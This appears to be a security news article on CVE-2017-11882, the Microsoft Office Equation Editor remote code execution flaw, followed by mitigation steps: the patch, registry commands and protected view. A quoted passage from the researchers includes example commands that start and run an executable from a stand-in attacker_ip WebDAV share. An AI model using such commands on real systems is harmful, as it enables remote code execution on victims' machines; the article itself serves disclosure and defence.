A shocking discovery by security researchers has stunned the technological world. This discovery is in a software that almost every computer consists i.e. Microsoft Office. What is more shocking is the presence of this vulnerability in MS office since 17 years.
Termed as the Microsoft Office RCE exploit, this flaw can be used by hackers to install malicious softwares on systems and that too remotely. This flaw is basically a memory corruption issue that is present in all versions of Microsoft Office including MS Office 365.
Thanks to researchers at Embedi which is a security research company who found this vulnerability. The flaw is termed officially as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. This file was introduced in MS Office 2000 for compatibility of documents from different versions. A corrupted memory operation is what turns this small component into a large scale risk.
Researchers at Embedi quoted:
“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it). One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker. Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient. After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”
Now what you can do to save yourself from this shocking Microsoft Office RCE exploit?
We have compiled a list of comprehensive steps to ensure that you remain safe:
- Install the Microsoft Office November’s patch
- Disable the feature by running a specific command by typing the following into your command prompt:
reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400
For 32-bit Microsoft Office package in x64 OS, run the following command:
reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400
- And last but not the least to stay safe from Microsoft Office RCE exploit: Use protected view as much as possible in Microsoft Office to prevent the execution of malicious softwares in your computer.
